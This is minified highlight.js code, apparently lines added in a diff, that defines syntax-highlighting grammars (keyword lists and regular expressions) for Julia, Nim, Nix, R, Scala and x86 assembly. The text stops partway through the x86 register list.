+hljs.registerLanguage("julia",function(){"use strict";return function(e){var r="[A-Za-z_\\u00A1-\\uFFFF][A-Za-z_0-9\\u00A1-\\uFFFF]*",t={$pattern:r,keyword:"in isa where baremodule begin break catch ccall const continue do else elseif end export false finally for function global if import importall let local macro module quote return true try using while type immutable abstract bitstype typealias ",literal:"true false ARGS C_NULL DevNull ENDIAN_BOM ENV I Inf Inf16 Inf32 Inf64 InsertionSort JULIA_HOME LOAD_PATH MergeSort NaN NaN16 NaN32 NaN64 PROGRAM_FILE QuickSort RoundDown RoundFromZero RoundNearest RoundNearestTiesAway RoundNearestTiesUp RoundToZero RoundUp STDERR STDIN STDOUT VERSION catalan e|0 eu|0 eulergamma golden im nothing pi γ π φ ",built_in:"ANY AbstractArray AbstractChannel AbstractFloat AbstractMatrix AbstractRNG AbstractSerializer AbstractSet AbstractSparseArray AbstractSparseMatrix AbstractSparseVector AbstractString AbstractUnitRange AbstractVecOrMat AbstractVector Any ArgumentError Array AssertionError Associative Base64DecodePipe Base64EncodePipe Bidiagonal BigFloat BigInt BitArray BitMatrix BitVector Bool BoundsError BufferStream CachingPool CapturedException CartesianIndex CartesianRange Cchar Cdouble Cfloat Channel Char Cint Cintmax_t Clong Clonglong ClusterManager Cmd CodeInfo Colon Complex Complex128 Complex32 Complex64 CompositeException Condition ConjArray ConjMatrix ConjVector Cptrdiff_t Cshort Csize_t Cssize_t Cstring Cuchar Cuint Cuintmax_t Culong Culonglong Cushort Cwchar_t Cwstring DataType Date DateFormat DateTime DenseArray DenseMatrix DenseVecOrMat DenseVector Diagonal Dict DimensionMismatch Dims DirectIndexString Display DivideError DomainError EOFError EachLine Enum Enumerate ErrorException Exception ExponentialBackOff Expr Factorization FileMonitor Float16 Float32 Float64 Function Future GlobalRef GotoNode HTML Hermitian IO IOBuffer IOContext IOStream IPAddr IPv4 IPv6 IndexCartesian IndexLinear IndexStyle InexactError InitError Int Int128 Int16 Int32 Int64 Int8 IntSet Integer InterruptException InvalidStateException Irrational KeyError LabelNode LinSpace LineNumberNode LoadError LowerTriangular MIME Matrix MersenneTwister Method MethodError MethodTable Module NTuple NewvarNode NullException Nullable Number ObjectIdDict OrdinalRange OutOfMemoryError OverflowError Pair ParseError PartialQuickSort PermutedDimsArray Pipe PollingFileWatcher ProcessExitedException Ptr QuoteNode RandomDevice Range RangeIndex Rational RawFD ReadOnlyMemoryError Real ReentrantLock Ref Regex RegexMatch RemoteChannel RemoteException RevString RoundingMode RowVector SSAValue SegmentationFault SerializationState Set SharedArray SharedMatrix SharedVector Signed SimpleVector Slot SlotNumber SparseMatrixCSC SparseVector StackFrame StackOverflowError StackTrace StepRange StepRangeLen StridedArray StridedMatrix StridedVecOrMat StridedVector String SubArray SubString SymTridiagonal Symbol Symmetric SystemError TCPSocket Task Text TextDisplay Timer Tridiagonal Tuple Type TypeError TypeMapEntry TypeMapLevel TypeName TypeVar TypedSlot UDPSocket UInt UInt128 UInt16 UInt32 UInt64 UInt8 UndefRefError UndefVarError UnicodeError UniformScaling Union UnionAll UnitRange Unsigned UpperTriangular Val Vararg VecElement VecOrMat Vector VersionNumber Void WeakKeyDict WeakRef WorkerConfig WorkerPool "},a={keywords:t,illegal:/<\//},n={className:"subst",begin:/\$\(/,end:/\)/,keywords:t},o={className:"variable",begin:"\\$"+r},i={className:"string",contains:[e.BACKSLASH_ESCAPE,n,o],variants:[{begin:/\w*"""/,end:/"""\w*/,relevance:10},{begin:/\w*"/,end:/"\w*/}]},l={className:"string",contains:[e.BACKSLASH_ESCAPE,n,o],begin:"`",end:"`"},s={className:"meta",begin:"@"+r};return a.name="Julia",a.contains=[{className:"number",begin:/(\b0x[\d_]*(\.[\d_]*)?|0x\.\d[\d_]*)p[-+]?\d+|\b0[box][a-fA-F0-9][a-fA-F0-9_]*|(\b\d[\d_]*(\.[\d_]*)?|\.\d[\d_]*)([eEfF][-+]?\d+)?/,relevance:0},{className:"string",begin:/'(.|\\[xXuU][a-zA-Z0-9]+)'/},i,l,s,{className:"comment",variants:[{begin:"#=",end:"=#",relevance:10},{begin:"#",end:"$"}]},e.HASH_COMMENT_MODE,{className:"keyword",begin:"\\b(((abstract|primitive)\\s+)type|(mutable\\s+)?struct)\\b"},{begin:/<:/}],n.contains=a.contains,a}}());
+hljs.registerLanguage("nim",function(){"use strict";return function(e){return{name:"Nim",aliases:["nim"],keywords:{keyword:"addr and as asm bind block break case cast const continue converter discard distinct div do elif else end enum except export finally for from func generic if import in include interface is isnot iterator let macro method mixin mod nil not notin object of or out proc ptr raise ref return shl shr static template try tuple type using var when while with without xor yield",literal:"shared guarded stdin stdout stderr result true false",built_in:"int int8 int16 int32 int64 uint uint8 uint16 uint32 uint64 float float32 float64 bool char string cstring pointer expr stmt void auto any range array openarray varargs seq set clong culong cchar cschar cshort cint csize clonglong cfloat cdouble clongdouble cuchar cushort cuint culonglong cstringarray semistatic"},contains:[{className:"meta",begin:/{\./,end:/\.}/,relevance:10},{className:"string",begin:/[a-zA-Z]\w*"/,end:/"/,contains:[{begin:/""/}]},{className:"string",begin:/([a-zA-Z]\w*)?"""/,end:/"""/},e.QUOTE_STRING_MODE,{className:"type",begin:/\b[A-Z]\w+\b/,relevance:0},{className:"number",relevance:0,variants:[{begin:/\b(0[xX][0-9a-fA-F][_0-9a-fA-F]*)('?[iIuU](8|16|32|64))?/},{begin:/\b(0o[0-7][_0-7]*)('?[iIuUfF](8|16|32|64))?/},{begin:/\b(0(b|B)[01][_01]*)('?[iIuUfF](8|16|32|64))?/},{begin:/\b(\d[_\d]*)('?[iIuUfF](8|16|32|64))?/}]},e.HASH_COMMENT_MODE]}}}());
+hljs.registerLanguage("nix",function(){"use strict";return function(e){var n={keyword:"rec with let in inherit assert if else then",literal:"true false or and null",built_in:"import abort baseNameOf dirOf isNull builtins map removeAttrs throw toString derivation"},i={className:"subst",begin:/\$\{/,end:/}/,keywords:n},t={className:"string",contains:[i],variants:[{begin:"''",end:"''"},{begin:'"',end:'"'}]},s=[e.NUMBER_MODE,e.HASH_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,t,{begin:/[a-zA-Z0-9-_]+(\s*=)/,returnBegin:!0,relevance:0,contains:[{className:"attr",begin:/\S+/}]}];return i.contains=s,{name:"Nix",aliases:["nixos"],keywords:n,contains:s}}}());
+hljs.registerLanguage("r",function(){"use strict";return function(e){var n="([a-zA-Z]|\\.[a-zA-Z.])[a-zA-Z0-9._]*";return{name:"R",contains:[e.HASH_COMMENT_MODE,{begin:n,keywords:{$pattern:n,keyword:"function if in break next repeat else for return switch while try tryCatch stop warning require library attach detach source setMethod setGeneric setGroupGeneric setClass ...",literal:"NULL NA TRUE FALSE T F Inf NaN NA_integer_|10 NA_real_|10 NA_character_|10 NA_complex_|10"},relevance:0},{className:"number",begin:"0[xX][0-9a-fA-F]+[Li]?\\b",relevance:0},{className:"number",begin:"\\d+(?:[eE][+\\-]?\\d*)?L\\b",relevance:0},{className:"number",begin:"\\d+\\.(?!\\d)(?:i\\b)?",relevance:0},{className:"number",begin:"\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d*)?i?\\b",relevance:0},{className:"number",begin:"\\.\\d+(?:[eE][+\\-]?\\d*)?i?\\b",relevance:0},{begin:"`",end:"`",relevance:0},{className:"string",contains:[e.BACKSLASH_ESCAPE],variants:[{begin:'"',end:'"'},{begin:"'",end:"'"}]}]}}}());
+hljs.registerLanguage("scala",function(){"use strict";return function(e){var n={className:"subst",variants:[{begin:"\\$[A-Za-z0-9_]+"},{begin:"\\${",end:"}"}]},a={className:"string",variants:[{begin:'"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE]},{begin:'"""',end:'"""',relevance:10},{begin:'[a-z]+"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE,n]},{className:"string",begin:'[a-z]+"""',end:'"""',contains:[n],relevance:10}]},s={className:"type",begin:"\\b[A-Z][A-Za-z0-9_]*",relevance:0},t={className:"title",begin:/[^0-9\n\t "'(),.`{}\[\]:;][^\n\t "'(),.`{}\[\]:;]+|[^0-9\n\t "'(),.`{}\[\]:;=]/,relevance:0},i={className:"class",beginKeywords:"class object trait type",end:/[:={\[\n;]/,excludeEnd:!0,contains:[{beginKeywords:"extends with",relevance:10},{begin:/\[/,end:/\]/,excludeBegin:!0,excludeEnd:!0,relevance:0,contains:[s]},{className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,relevance:0,contains:[s]},t]},l={className:"function",beginKeywords:"def",end:/[:={\[(\n;]/,excludeEnd:!0,contains:[t]};return{name:"Scala",keywords:{literal:"true false null",keyword:"type yield lazy override def with val var sealed abstract private trait object if forSome for while throw finally protected extends import final return else break new catch super class case package default try this match continue throws implicit"},contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,a,{className:"symbol",begin:"'\\w[\\w\\d_]*(?!')"},s,l,i,e.C_NUMBER_MODE,{className:"meta",begin:"@[A-Za-z]+"}]}}}());
+hljs.registerLanguage("x86asm",function(){"use strict";return function(s){return{name:"Intel x86 Assembly",case_insensitive:!0,keywords:{$pattern:"[.%]?"+s.IDENT_RE,keyword:"lock rep repe repz repne repnz xaquire xrelease bnd nobnd aaa aad aam aas adc add and arpl bb0_reset bb1_reset bound bsf bsr bswap bt btc btr bts call cbw cdq cdqe clc cld cli clts cmc cmp cmpsb cmpsd cmpsq cmpsw cmpxchg cmpxchg486 cmpxchg8b cmpxchg16b cpuid cpu_read cpu_write cqo cwd cwde daa das dec div dmint emms enter equ f2xm1 fabs fadd faddp fbld fbstp fchs fclex fcmovb fcmovbe fcmove fcmovnb fcmovnbe fcmovne fcmovnu fcmovu fcom fcomi fcomip fcomp fcompp fcos fdecstp fdisi fdiv fdivp fdivr fdivrp femms feni ffree ffreep fiadd ficom ficomp fidiv fidivr fild fimul fincstp finit fist fistp fisttp fisub fisubr fld fld1 fldcw fldenv fldl2e fldl2t fldlg2 fldln2 fldpi fldz fmul fmulp fnclex fndisi fneni fninit fnop fnsave fnstcw fnstenv fnstsw fpatan fprem fprem1 fptan frndint frstor fsave fscale fsetpm fsin fsincos fsqrt fst fstcw fstenv fstp fstsw fsub fsubp fsubr fsubrp ftst fucom fucomi fucomip fucomp fucompp fxam fxch fxtract fyl2x fyl2xp1 hlt ibts icebp idiv imul in inc incbin insb insd insw int int01 int1 int03 int3 into invd invpcid invlpg invlpga iret iretd iretq iretw jcxz jecxz jrcxz jmp jmpe lahf lar lds lea leave les lfence lfs lgdt lgs lidt lldt lmsw loadall loadall286 lodsb lodsd lodsq lodsw loop loope loopne loopnz loopz lsl lss ltr mfence monitor mov movd movq movsb movsd movsq movsw movsx movsxd movzx mul mwait neg nop not or out outsb outsd outsw packssdw packsswb packuswb paddb paddd paddsb paddsiw paddsw paddusb paddusw paddw pand pandn pause paveb pavgusb pcmpeqb pcmpeqd pcmpeqw pcmpgtb pcmpgtd pcmpgtw pdistib pf2id pfacc pfadd pfcmpeq pfcmpge pfcmpgt pfmax pfmin pfmul pfrcp pfrcpit1 pfrcpit2 pfrsqit1 pfrsqrt pfsub pfsubr pi2fd pmachriw pmaddwd pmagw pmulhriw pmulhrwa pmulhrwc pmulhw pmullw pmvgezb pmvlzb pmvnzb pmvzb pop popa popad popaw popf popfd popfq popfw por prefetch prefetchw pslld psllq psllw psrad psraw psrld psrlq psrlw psubb psubd psubsb psubsiw psubsw psubusb psubusw psubw punpckhbw punpckhdq punpckhwd punpcklbw punpckldq punpcklwd push pusha pushad pushaw pushf pushfd pushfq pushfw pxor rcl rcr rdshr rdmsr rdpmc rdtsc rdtscp ret retf retn rol ror rdm rsdc rsldt rsm rsts sahf sal salc sar sbb scasb scasd scasq scasw sfence sgdt shl shld shr shrd sidt sldt skinit smi smint smintold smsw stc std sti stosb stosd stosq stosw str sub svdc svldt svts swapgs syscall sysenter sysexit sysret test ud0 ud1 ud2b ud2 ud2a umov verr verw fwait wbinvd wrshr wrmsr xadd xbts xchg xlatb xlat xor cmove cmovz cmovne cmovnz cmova cmovnbe cmovae cmovnb cmovb cmovnae cmovbe cmovna cmovg cmovnle cmovge cmovnl cmovl cmovnge cmovle cmovng cmovc cmovnc cmovo cmovno cmovs cmovns cmovp cmovpe cmovnp cmovpo je jz jne jnz ja jnbe jae jnb jb jnae jbe jna jg jnle jge jnl jl jnge jle jng jc jnc jo jno js jns jpo jnp jpe jp sete setz setne setnz seta setnbe setae setnb setnc setb setnae setcset setbe setna setg setnle setge setnl setl setnge setle setng sets setns seto setno setpe setp setpo setnp addps addss andnps andps cmpeqps cmpeqss cmpleps cmpless cmpltps cmpltss cmpneqps cmpneqss cmpnleps cmpnless cmpnltps cmpnltss cmpordps cmpordss cmpunordps cmpunordss cmpps cmpss comiss cvtpi2ps cvtps2pi cvtsi2ss cvtss2si cvttps2pi cvttss2si divps divss ldmxcsr maxps maxss minps minss movaps movhps movlhps movlps movhlps movmskps movntps movss movups mulps mulss orps rcpps rcpss rsqrtps rsqrtss shufps sqrtps sqrtss stmxcsr subps subss ucomiss unpckhps unpcklps xorps fxrstor fxrstor64 fxsave fxsave64 xgetbv xsetbv xsave xsave64 xsaveopt xsaveopt64 xrstor xrstor64 prefetchnta prefetcht0 prefetcht1 prefetcht2 maskmovq movntq pavgb pavgw pextrw pinsrw pmaxsw pmaxub pminsw pminub pmovmskb pmulhuw psadbw pshufw pf2iw pfnacc pfpnacc pi2fw pswapd maskmovdqu clflush movntdq movnti movntpd movdqa movdqu movdq2q movq2dq paddq pmuludq pshufd pshufhw pshuflw pslldq psrldq psubq punpckhqdq punpcklqdq addpd addsd andnpd andpd cmpeqpd cmpeqsd cmplepd cmplesd cmpltpd cmpltsd cmpneqpd cmpneqsd cmpnlepd cmpnlesd cmpnltpd cmpnltsd cmpordpd cmpordsd cmpunordpd cmpunordsd cmppd comisd cvtdq2pd cvtdq2ps cvtpd2dq cvtpd2pi cvtpd2ps cvtpi2pd cvtps2dq cvtps2pd cvtsd2si cvtsd2ss cvtsi2sd cvtss2sd cvttpd2pi cvttpd2dq cvttps2dq cvttsd2si divpd divsd maxpd maxsd minpd minsd movapd movhpd movlpd movmskpd movupd mulpd mulsd orpd shufpd sqrtpd sqrtsd subpd subsd ucomisd unpckhpd unpcklpd xorpd addsubpd addsubps haddpd haddps hsubpd hsubps lddqu movddup movshdup movsldup clgi stgi vmcall vmclear vmfunc vmlaunch vmload vmmcall vmptrld vmptrst vmread vmresume vmrun vmsave vmwrite vmxoff vmxon invept invvpid pabsb pabsw pabsd palignr phaddw phaddd phaddsw phsubw phsubd phsubsw pmaddubsw pmulhrsw pshufb psignb psignw psignd extrq insertq movntsd movntss lzcnt blendpd blendps blendvpd blendvps dppd dpps extractps insertps movntdqa mpsadbw packusdw pblendvb pblendw pcmpeqq pextrb pextrd pextrq phminposuw pinsrb pinsrd pinsrq pmaxsb pmaxsd pmaxud pmaxuw pminsb pminsd pminud pminuw pmovsxbw pmovsxbd pmovsxbq pmovsxwd pmovsxwq pmovsxdq pmovzxbw pmovzxbd pmovzxbq pmovzxwd pmovzxwq pmovzxdq pmuldq pmulld ptest roundpd roundps roundsd roundss crc32 pcmpestri pcmpestrm pcmpistri pcmpistrm pcmpgtq popcnt getsec pfrcpv pfrsqrtv movbe aesenc aesenclast aesdec aesdeclast aesimc aeskeygenassist vaesenc vaesenclast vaesdec vaesdeclast vaesimc vaeskeygenassist vaddpd vaddps vaddsd vaddss vaddsubpd vaddsubps vandpd vandps vandnpd vandnps vblendpd vblendps vblendvpd vblendvps vbroadcastss vbroadcastsd vbroadcastf128 vcmpeq_ospd vcmpeqpd vcmplt_ospd vcmpltpd vcmple_ospd vcmplepd vcmpunord_qpd vcmpunordpd vcmpneq_uqpd vcmpneqpd vcmpnlt_uspd vcmpnltpd vcmpnle_uspd vcmpnlepd vcmpord_qpd vcmpordpd vcmpeq_uqpd vcmpnge_uspd vcmpngepd vcmpngt_uspd vcmpngtpd vcmpfalse_oqpd vcmpfalsepd vcmpneq_oqpd vcmpge_ospd vcmpgepd vcmpgt_ospd vcmpgtpd vcmptrue_uqpd vcmptruepd vcmplt_oqpd vcmple_oqpd vcmpunord_spd vcmpneq_uspd vcmpnlt_uqpd vcmpnle_uqpd vcmpord_spd vcmpeq_uspd vcmpnge_uqpd vcmpngt_uqpd vcmpfalse_ospd vcmpneq_ospd vcmpge_oqpd vcmpgt_oqpd vcmptrue_uspd vcmppd vcmpeq_osps vcmpeqps vcmplt_osps vcmpltps vcmple_osps vcmpleps vcmpunord_qps vcmpunordps vcmpneq_uqps vcmpneqps vcmpnlt_usps vcmpnltps vcmpnle_usps vcmpnleps vcmpord_qps vcmpordps vcmpeq_uqps vcmpnge_usps vcmpngeps vcmpngt_usps vcmpngtps vcmpfalse_oqps vcmpfalseps vcmpneq_oqps vcmpge_osps vcmpgeps vcmpgt_osps vcmpgtps vcmptrue_uqps vcmptrueps vcmplt_oqps vcmple_oqps vcmpunord_sps vcmpneq_usps vcmpnlt_uqps vcmpnle_uqps vcmpord_sps vcmpeq_usps vcmpnge_uqps vcmpngt_uqps vcmpfalse_osps vcmpneq_osps vcmpge_oqps vcmpgt_oqps vcmptrue_usps vcmpps vcmpeq_ossd vcmpeqsd vcmplt_ossd vcmpltsd vcmple_ossd vcmplesd vcmpunord_qsd vcmpunordsd vcmpneq_uqsd vcmpneqsd vcmpnlt_ussd vcmpnltsd vcmpnle_ussd vcmpnlesd vcmpord_qsd vcmpordsd vcmpeq_uqsd vcmpnge_ussd vcmpngesd vcmpngt_ussd vcmpngtsd vcmpfalse_oqsd vcmpfalsesd vcmpneq_oqsd vcmpge_ossd vcmpgesd vcmpgt_ossd vcmpgtsd vcmptrue_uqsd vcmptruesd vcmplt_oqsd vcmple_oqsd vcmpunord_ssd vcmpneq_ussd vcmpnlt_uqsd vcmpnle_uqsd vcmpord_ssd vcmpeq_ussd vcmpnge_uqsd vcmpngt_uqsd vcmpfalse_ossd vcmpneq_ossd vcmpge_oqsd vcmpgt_oqsd vcmptrue_ussd vcmpsd vcmpeq_osss vcmpeqss vcmplt_osss vcmpltss vcmple_osss vcmpless vcmpunord_qss vcmpunordss vcmpneq_uqss vcmpneqss vcmpnlt_usss vcmpnltss vcmpnle_usss vcmpnless vcmpord_qss vcmpordss vcmpeq_uqss vcmpnge_usss vcmpngess vcmpngt_usss vcmpngtss vcmpfalse_oqss vcmpfalsess vcmpneq_oqss vcmpge_osss vcmpgess vcmpgt_osss vcmpgtss vcmptrue_uqss vcmptruess vcmplt_oqss vcmple_oqss vcmpunord_sss vcmpneq_usss vcmpnlt_uqss vcmpnle_uqss vcmpord_sss vcmpeq_usss vcmpnge_uqss vcmpngt_uqss vcmpfalse_osss vcmpneq_osss vcmpge_oqss vcmpgt_oqss vcmptrue_usss vcmpss vcomisd vcomiss vcvtdq2pd vcvtdq2ps vcvtpd2dq vcvtpd2ps vcvtps2dq vcvtps2pd vcvtsd2si vcvtsd2ss vcvtsi2sd vcvtsi2ss vcvtss2sd vcvtss2si vcvttpd2dq vcvttps2dq vcvttsd2si vcvttss2si vdivpd vdivps vdivsd vdivss vdppd vdpps vextractf128 vextractps vhaddpd vhaddps vhsubpd vhsubps vinsertf128 vinsertps vlddqu vldqqu vldmxcsr vmaskmovdqu vmaskmovps vmaskmovpd vmaxpd vmaxps vmaxsd vmaxss vminpd vminps vminsd vminss vmovapd vmovaps vmovd vmovq vmovddup vmovdqa vmovqqa vmovdqu vmovqqu vmovhlps vmovhpd vmovhps vmovlhps vmovlpd vmovlps vmovmskpd vmovmskps vmovntdq vmovntqq vmovntdqa vmovntpd vmovntps vmovsd vmovshdup vmovsldup vmovss vmovupd vmovups vmpsadbw vmulpd vmulps vmulsd vmulss vorpd vorps vpabsb vpabsw vpabsd vpacksswb vpackssdw vpackuswb vpackusdw vpaddb vpaddw vpaddd vpaddq vpaddsb vpaddsw vpaddusb vpaddusw vpalignr vpand vpandn vpavgb vpavgw vpblendvb vpblendw vpcmpestri vpcmpestrm vpcmpistri vpcmpistrm vpcmpeqb vpcmpeqw vpcmpeqd vpcmpeqq vpcmpgtb vpcmpgtw vpcmpgtd vpcmpgtq vpermilpd vpermilps vperm2f128 vpextrb vpextrw vpextrd vpextrq vphaddw vphaddd vphaddsw vphminposuw vphsubw vphsubd vphsubsw vpinsrb vpinsrw vpinsrd vpinsrq vpmaddwd vpmaddubsw vpmaxsb vpmaxsw vpmaxsd vpmaxub vpmaxuw vpmaxud vpminsb vpminsw vpminsd vpminub vpminuw vpminud vpmovmskb vpmovsxbw vpmovsxbd vpmovsxbq vpmovsxwd vpmovsxwq vpmovsxdq vpmovzxbw vpmovzxbd vpmovzxbq vpmovzxwd vpmovzxwq vpmovzxdq vpmulhuw vpmulhrsw vpmulhw vpmullw vpmulld vpmuludq vpmuldq vpor vpsadbw vpshufb vpshufd vpshufhw vpshuflw vpsignb vpsignw vpsignd vpslldq vpsrldq vpsllw vpslld vpsllq vpsraw vpsrad vpsrlw vpsrld vpsrlq vptest vpsubb vpsubw vpsubd vpsubq vpsubsb vpsubsw vpsubusb vpsubusw vpunpckhbw vpunpckhwd vpunpckhdq vpunpckhqdq vpunpcklbw vpunpcklwd vpunpckldq vpunpcklqdq vpxor vrcpps vrcpss vrsqrtps vrsqrtss vroundpd vroundps vroundsd vroundss vshufpd vshufps vsqrtpd vsqrtps vsqrtsd vsqrtss vstmxcsr vsubpd vsubps vsubsd vsubss vtestps vtestpd vucomisd vucomiss vunpckhpd vunpckhps vunpcklpd vunpcklps vxorpd vxorps vzeroall vzeroupper pclmullqlqdq pclmulhqlqdq pclmullqhqdq pclmulhqhqdq pclmulqdq vpclmullqlqdq vpclmulhqlqdq vpclmullqhqdq vpclmulhqhqdq vpclmulqdq vfmadd132ps vfmadd132pd vfmadd312ps vfmadd312pd vfmadd213ps vfmadd213pd vfmadd123ps vfmadd123pd vfmadd231ps vfmadd231pd vfmadd321ps vfmadd321pd vfmaddsub132ps vfmaddsub132pd vfmaddsub312ps vfmaddsub312pd vfmaddsub213ps vfmaddsub213pd vfmaddsub123ps vfmaddsub123pd vfmaddsub231ps vfmaddsub231pd vfmaddsub321ps vfmaddsub321pd vfmsub132ps vfmsub132pd vfmsub312ps vfmsub312pd vfmsub213ps vfmsub213pd vfmsub123ps vfmsub123pd vfmsub231ps vfmsub231pd vfmsub321ps vfmsub321pd vfmsubadd132ps vfmsubadd132pd vfmsubadd312ps vfmsubadd312pd vfmsubadd213ps vfmsubadd213pd vfmsubadd123ps vfmsubadd123pd vfmsubadd231ps vfmsubadd231pd vfmsubadd321ps vfmsubadd321pd vfnmadd132ps vfnmadd132pd vfnmadd312ps vfnmadd312pd vfnmadd213ps vfnmadd213pd vfnmadd123ps vfnmadd123pd vfnmadd231ps vfnmadd231pd vfnmadd321ps vfnmadd321pd vfnmsub132ps vfnmsub132pd vfnmsub312ps vfnmsub312pd vfnmsub213ps vfnmsub213pd vfnmsub123ps vfnmsub123pd vfnmsub231ps vfnmsub231pd vfnmsub321ps vfnmsub321pd vfmadd132ss vfmadd132sd vfmadd312ss vfmadd312sd vfmadd213ss vfmadd213sd vfmadd123ss vfmadd123sd vfmadd231ss vfmadd231sd vfmadd321ss vfmadd321sd vfmsub132ss vfmsub132sd vfmsub312ss vfmsub312sd vfmsub213ss vfmsub213sd vfmsub123ss vfmsub123sd vfmsub231ss vfmsub231sd vfmsub321ss vfmsub321sd vfnmadd132ss vfnmadd132sd vfnmadd312ss vfnmadd312sd vfnmadd213ss vfnmadd213sd vfnmadd123ss vfnmadd123sd vfnmadd231ss vfnmadd231sd vfnmadd321ss vfnmadd321sd vfnmsub132ss vfnmsub132sd vfnmsub312ss vfnmsub312sd vfnmsub213ss vfnmsub213sd vfnmsub123ss vfnmsub123sd vfnmsub231ss vfnmsub231sd vfnmsub321ss vfnmsub321sd rdfsbase rdgsbase rdrand wrfsbase wrgsbase vcvtph2ps vcvtps2ph adcx adox rdseed clac stac xstore xcryptecb xcryptcbc xcryptctr xcryptcfb xcryptofb montmul xsha1 xsha256 llwpcb slwpcb lwpval lwpins vfmaddpd vfmaddps vfmaddsd vfmaddss vfmaddsubpd vfmaddsubps vfmsubaddpd vfmsubaddps vfmsubpd vfmsubps vfmsubsd vfmsubss vfnmaddpd vfnmaddps vfnmaddsd vfnmaddss vfnmsubpd vfnmsubps vfnmsubsd vfnmsubss vfrczpd vfrczps vfrczsd vfrczss vpcmov vpcomb vpcomd vpcomq vpcomub vpcomud vpcomuq vpcomuw vpcomw vphaddbd vphaddbq vphaddbw vphadddq vphaddubd vphaddubq vphaddubw vphaddudq vphadduwd vphadduwq vphaddwd vphaddwq vphsubbw vphsubdq vphsubwd vpmacsdd vpmacsdqh vpmacsdql vpmacssdd vpmacssdqh vpmacssdql vpmacsswd vpmacssww vpmacswd vpmacsww vpmadcsswd vpmadcswd vpperm vprotb vprotd vprotq vprotw vpshab vpshad vpshaq vpshaw vpshlb vpshld vpshlq vpshlw vbroadcasti128 vpblendd vpbroadcastb vpbroadcastw vpbroadcastd vpbroadcastq vpermd vpermpd vpermps vpermq vperm2i128 vextracti128 vinserti128 vpmaskmovd vpmaskmovq vpsllvd vpsllvq vpsravd vpsrlvd vpsrlvq vgatherdpd vgatherqpd vgatherdps vgatherqps vpgatherdd vpgatherqd vpgatherdq vpgatherqq xabort xbegin xend xtest andn bextr blci blcic blsi blsic blcfill blsfill blcmsk blsmsk blsr blcs bzhi mulx pdep pext rorx sarx shlx shrx tzcnt tzmsk t1mskc valignd valignq vblendmpd vblendmps vbroadcastf32x4 vbroadcastf64x4 vbroadcasti32x4 vbroadcasti64x4 vcompresspd vcompressps vcvtpd2udq vcvtps2udq vcvtsd2usi vcvtss2usi vcvttpd2udq vcvttps2udq vcvttsd2usi vcvttss2usi vcvtudq2pd vcvtudq2ps vcvtusi2sd vcvtusi2ss vexpandpd vexpandps vextractf32x4 vextractf64x4 vextracti32x4 vextracti64x4 vfixupimmpd vfixupimmps vfixupimmsd vfixupimmss vgetexppd vgetexpps vgetexpsd vgetexpss vgetmantpd vgetmantps vgetmantsd vgetmantss vinsertf32x4 vinsertf64x4 vinserti32x4 vinserti64x4 vmovdqa32 vmovdqa64 vmovdqu32 vmovdqu64 vpabsq vpandd vpandnd vpandnq vpandq vpblendmd vpblendmq vpcmpltd vpcmpled vpcmpneqd vpcmpnltd vpcmpnled vpcmpd vpcmpltq vpcmpleq vpcmpneqq vpcmpnltq vpcmpnleq vpcmpq vpcmpequd vpcmpltud vpcmpleud vpcmpnequd vpcmpnltud vpcmpnleud vpcmpud vpcmpequq vpcmpltuq vpcmpleuq vpcmpnequq vpcmpnltuq vpcmpnleuq vpcmpuq vpcompressd vpcompressq vpermi2d vpermi2pd vpermi2ps vpermi2q vpermt2d vpermt2pd vpermt2ps vpermt2q vpexpandd vpexpandq vpmaxsq vpmaxuq vpminsq vpminuq vpmovdb vpmovdw vpmovqb vpmovqd vpmovqw vpmovsdb vpmovsdw vpmovsqb vpmovsqd vpmovsqw vpmovusdb vpmovusdw vpmovusqb vpmovusqd vpmovusqw vpord vporq vprold vprolq vprolvd vprolvq vprord vprorq vprorvd vprorvq vpscatterdd vpscatterdq vpscatterqd vpscatterqq vpsraq vpsravq vpternlogd vpternlogq vptestmd vptestmq vptestnmd vptestnmq vpxord vpxorq vrcp14pd vrcp14ps vrcp14sd vrcp14ss vrndscalepd vrndscaleps vrndscalesd vrndscaless vrsqrt14pd vrsqrt14ps vrsqrt14sd vrsqrt14ss vscalefpd vscalefps vscalefsd vscalefss vscatterdpd vscatterdps vscatterqpd vscatterqps vshuff32x4 vshuff64x2 vshufi32x4 vshufi64x2 kandnw kandw kmovw knotw kortestw korw kshiftlw kshiftrw kunpckbw kxnorw kxorw vpbroadcastmb2q vpbroadcastmw2d vpconflictd vpconflictq vplzcntd vplzcntq vexp2pd vexp2ps vrcp28pd vrcp28ps vrcp28sd vrcp28ss vrsqrt28pd vrsqrt28ps vrsqrt28sd vrsqrt28ss vgatherpf0dpd vgatherpf0dps vgatherpf0qpd vgatherpf0qps vgatherpf1dpd vgatherpf1dps vgatherpf1qpd vgatherpf1qps vscatterpf0dpd vscatterpf0dps vscatterpf0qpd vscatterpf0qps vscatterpf1dpd vscatterpf1dps vscatterpf1qpd vscatterpf1qps prefetchwt1 bndmk bndcl bndcu bndcn bndmov bndldx bndstx sha1rnds4 sha1nexte sha1msg1 sha1msg2 sha256rnds2 sha256msg1 sha256msg2 hint_nop0 hint_nop1 hint_nop2 hint_nop3 hint_nop4 hint_nop5 hint_nop6 hint_nop7 hint_nop8 hint_nop9 hint_nop10 hint_nop11 hint_nop12 hint_nop13 hint_nop14 hint_nop15 hint_nop16 hint_nop17 hint_nop18 hint_nop19 hint_nop20 hint_nop21 hint_nop22 hint_nop23 hint_nop24 hint_nop25 hint_nop26 hint_nop27 hint_nop28 hint_nop29 hint_nop30 hint_nop31 hint_nop32 hint_nop33 hint_nop34 hint_nop35 hint_nop36 hint_nop37 hint_nop38 hint_nop39 hint_nop40 hint_nop41 hint_nop42 hint_nop43 hint_nop44 hint_nop45 hint_nop46 hint_nop47 hint_nop48 hint_nop49 hint_nop50 hint_nop51 hint_nop52 hint_nop53 hint_nop54 hint_nop55 hint_nop56 hint_nop57 hint_nop58 hint_nop59 hint_nop60 hint_nop61 hint_nop62 hint_nop63",built_in:"ip eip rip al ah bl bh cl ch dl dh sil dil bpl spl r8b r9b r10b r11b r12b r13b r14b r15b ax bx cx dx si di bp sp r8w r9w r10w r11w r12w r13w r14w r15w eax ebx ecx edx esi edi ebp esp eip r8d r9d r10d r11d r12d r13d r14d r15d rax rbx rcx rdx rsi rdi rbp 